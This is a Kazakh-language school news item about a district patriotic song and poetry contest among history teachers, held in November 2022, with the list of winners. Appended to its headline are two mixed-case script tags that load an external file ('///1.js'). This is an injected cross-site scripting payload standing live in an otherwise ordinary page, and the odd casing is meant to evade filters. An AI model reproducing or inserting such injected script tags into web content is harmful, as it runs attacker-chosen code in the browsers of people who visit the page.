«Қазағым деп соғады жүрегім» атты патриоттық ән – жыр байқауы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

14.11.2022

2022 жылдың 11 қараша күні Қоянды ауылы №2 орта мектебінде Целиноград ауданының тарих пәні мұғалімдерінің арасында «Қазағым деп соғады жүрегім» атты патриоттық ән – жыр байқауы өткізілді. Байқауға 13 тарих пәні мұғалімі қатысты. Сайыс екі кезеңнен тұрды. 1 кезең – "Тұлғаны сомдаған тұрлаулы туындылар"

/ тарихи тұлғаларды сомдау, монолог оқу, мәнерлеп оқу, көрініс көрсету/

2 кезең – «Қазағым деп соғады жүрегім»  / патриоттық ән – жыр/ Байқау қорытындысы бойынша жүлдегерлер қатарында бірінші орынды – Қараөткел ауылы №1 орта мектебі тарих пәні мұғалімі - Хабай Бақытгүл, екінші орынға -    Қоянды ауылы №1 орта мектебі тарих пәні мұғалімі Цэрэг Назыра және Қоянды ауылы №2 орта тарих пәні мұғалімі - Рахам Силам, үшінші орынды Р.Қошқарбаев ауылы орта мектебі тарих пәні мұғалімі – Жургембаева Меруерт Құдайбергенова, Ынтымақ ауылы орта мектебі тарих пәні мұғалімі -

Дүйсенова Айгүл Қайсаровна, Кабзулданова Жұлдыз Серыкказыевна – Шұбар ауылы негізгі мектебі тарих пәні мұғалімі. Жеңіске жеткен жеңімпаздарды құттықтаймыз.

Просмотров: 682


Пікір қосу



Деректерді қолтаңбаға қосу